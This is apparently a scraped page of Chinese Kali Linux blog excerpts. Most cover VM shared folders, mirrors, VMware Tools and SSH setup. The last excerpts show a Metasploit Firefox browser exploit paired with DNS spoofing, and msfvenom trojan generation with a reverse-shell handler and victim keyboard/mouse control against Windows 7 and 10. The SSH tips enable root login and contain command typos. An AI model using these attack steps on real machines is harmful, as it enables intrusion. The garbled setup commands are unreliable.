kali

VM中的Kali创建共享文件夹与DVWA的安装,配置

别说谁变了你拦得住时间么 提交于 2019-11-26 20:41:20
几天没发blog,又没学到啥,刚好今天我们学校网安协会的课开播了,今天就把之前收集过VMware上装了kali之后通过共享文件夹从本机上传到最后安装dvwa的比较全的过程,还有一些大佬之前有用的文章整合一下,但是,不一定适用于所有人。快九月了,新生来到之后没准可以看看。 一.安装VMware-tools 没啥好讲的,点击上方的虚拟机菜单,点击VMware-tools安装就ok了。 二.创建共享文件夹 在关机的情况下,点击上方的虚拟机菜单,点击 设置,或者直接快捷键Ctrl+D, 再点击 选项,可以看到 共享文件夹 选择 总是启用 然后再设置一下共享文件夹位置,剩下默认就可以了。 三.没有出现hgfs文件 共享文件夹设置之后,我们本来应该在 其他位置 - 计算机 – mnt 文件夹下寻找共享文件加hgfs 。但是我这里没有。如果你们有的话,可以直接跳过这点。 没有的话可以试试这三条命令: apt-get install open-vm-dkms mount -t vmhgfs .host:/ /mnt/ 如果第一条命令出现这个结果:E: Unable to locate package open-vm-dkms 可以尝试: apt-get install open-vm-tools mkdir /mnt/hgfs mount -t vmhgfs .host:/ /mun/hgfs

Kali换源

痴心易碎 提交于 2019-11-26 17:52:36
vim /etc/apt/sources.list 中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 阿里 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb http://mirrors.aliyun.com/kali-security/ kali-rolling main contrib non-free deb-src http://mirrors.aliyun.com/kali-security/ kali-rolling main contrib non-free 用如下命令 apt-get update apt-get upgrade apt-get dist-upgrade apt-get clean apt-get常用命令: update – 取回更新的软件包列表信息 upgrade – 进行一次升级 install – 安装新的软件包(注:软件包名称是 libc6 而非 libc6.deb) remove – 卸载软件包

Kali Virtual Appliance Installation and Usage

女生的网名这么多〃 提交于 2019-11-26 16:21:40
Kali Linux is the world’s most powerful and popular penetration testing platform, used by security professionals in a wide range of specializations, including penetration testing, forensics, reverse engineering, and vulnerability assessment. It is the culmination of years of refinement and the result of a continuous evolution of the platform, from WHoppiX to WHAX, to BackTrack, and now to a complete penetration testing framework leveraging many features of Debian GNU/Linux and the vibrant open source community worldwide. Kali Linux has not been built to be a simple collection of tools, but

Kali Usage Tips and Tricks

落爺英雄遲暮 提交于 2019-11-26 16:16:58
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Download Kali: https://www.kali.org/downloads/ Basic Configuration Videos: 1. Use Proxychains and Tor to Visit Internet 1.1 Configure Proxychains [email protected] :~# vi /etc/proxychains.conf You can choose between dynamic_chain, stric_chain or random_chaim. Dynamic_chain will be preferred. #

如何在kali Linux上安装VMware Tools

怎甘沉沦 提交于 2019-11-26 13:06:43
作用: 1.让虚拟机和本地上的文件可以互传,直接拖动就可以实现转接 2.可在虚拟机上执行本地脚本 3.本地时钟与虚拟机同步 4........... 方法: 1.运行虚拟机 2.在上方菜单栏中点击安装VM Tools 待它安装完后我们虚拟机上就会出现VM Tools的安装文件 2.打开终端 root@kali:~# mount 在最下方找到类似于 /dev/cdrom on /mnt/cdrom type iso9660 (ro,nosuid,nodev)的报告行 这里的/mnt/cdrom是虚拟机上VM Tools的安装文件所在,我的虚拟机上的地址就是mkdir/cdrom0,你们自己的可能跟我不一样,不过可以打开看看是不是VM Tools安装文件 3.在终端中打开工作目录 root@kali:~# cd /tmp 4.在终端中解压缩安装 在终端打开运行的工作目录下输入tar zxpf /mnt/cdrom/VMwareTools- x.x.x - yyyy .tar.gz 最后的/mnt.cdrom/VM......是安装文件的名字,这个东西在之前打开的安装目录中可以找到 最后等他解压安装完成 5.在终端中运行安装程序并以 root 用户身份配置 VMware Tools。 root@kali:~# cd vmware-tools-distrib root@kali

kali 开启ssh服务

我与影子孤独终老i 提交于 2019-11-26 12:18:15
kali 开启ssh服务 1. 一、配置SSH参数 修改sshd_config文件,命令为: vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes 2. 将PermitRootLogin without-password修改为 PermitRootLogin yes 3. 然后,保存,退出vim。 4. 二、启动SSH服务 命令为: /etc/init.d/ssh start 或者 service ssh start 查看SSH服务状态是否正常运行,命令为: /etc/init.d/ssh status 或者 service ssh status 5. 三、使用SSH登录工具(Putty\SecureCRT\XShell)登录kali 6. 输入用户名、密码后,如果使用SSH连接工具还是连不上kali 2.0,如下图所示: 7. 那么要先生成两个密钥: #ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #ssh-keygen -t dsa -f /etc/ssh/ssh_host_rsa_key 执行命令后都会让输入密码,直接敲回车设置为空即可 8. 再使用SSH连接工具重新连接kali,成功搞定! 9. 四

kali vmware安装后按照vmware工具

我的梦境 提交于 2019-11-26 12:17:21
在终端输入 leafpad /etc/apt/sources.list 的sources.list 添加镜像源 debhttp://http.kali.org/kali kali-rolling main non-free contrib 或 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 接着输入 apt-get update(更新源) apt-get install open-vm-tools-desktop fuse(安装open-vm-tools) reboot(重启生效) 以下步骤可选: apt-get upgrade(更新软件,文件较大) apt-get clean(清除软件包) 来源: https://www.cnblogs.com/minipython/p/11319637.html

kali linux metasploit的web渗透测试(二)-内网火狐浏览器渗透拿权限

假装没事ソ 提交于 2019-11-26 09:25:04
这一章,介绍如何利用metasploit进行火狐浏览器的渗透拿权限,需要在内网环境下 需要利用的技术是:可以使用ettercap(dns欺骗)或者mitmf(插入一段html地址),这两项技术就不再这里介绍与操作了,如何操作,请自行百度! 利用的模块有:exploit/multi/browser/firefox_webidl_injection,exploit/firefox/local/exec_shellcode ----绕过360拿shell 第一个模块:firefox_webidl_injection 是生成一个攻击链接,然后使用ettercap的dns欺骗或者mitmf插入这段攻击链接,只要让受害者访问这个链接,就会返回一个shell firefox的session 。 第二个模块:exec_shellcode是把上一个模块获取到的shell firefox session 提升为meterpreter,拿到meterpreter,然后进行进一步的渗透,下面介绍使用方法 打开metasploit,使用use来调用这两个模块 第一个模块:firefox_webidl_injection 对火狐浏览器使用的版本有限制,使用info命令查看Description的详情来查看适用版本范围 这里显示对firefox 22-27版本的才有效,于是我在kali

kali渗透测试win10

喜你入骨 提交于 2019-11-26 09:23:41
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 172.16.4.3 #设置本地ip lhost => 172.16.4.3 msf exploit(multi/handler) > set lport 44444 #设置本地端口 lport => 44444 msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 172.16.4.3:44444 tcp链接以后可以使用以下功能 uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all

kali渗透测试win7

半世苍凉 提交于 2019-11-26 09:23:26
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 172.16.4.3 #设置本地ip lhost => 172.16.4.3 msf exploit(multi/handler) > set lport 44444 #设置本地端口 lport => 44444 msf exploit(multi/handler) > exploit tcp链接以后可以使用以下功能 uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl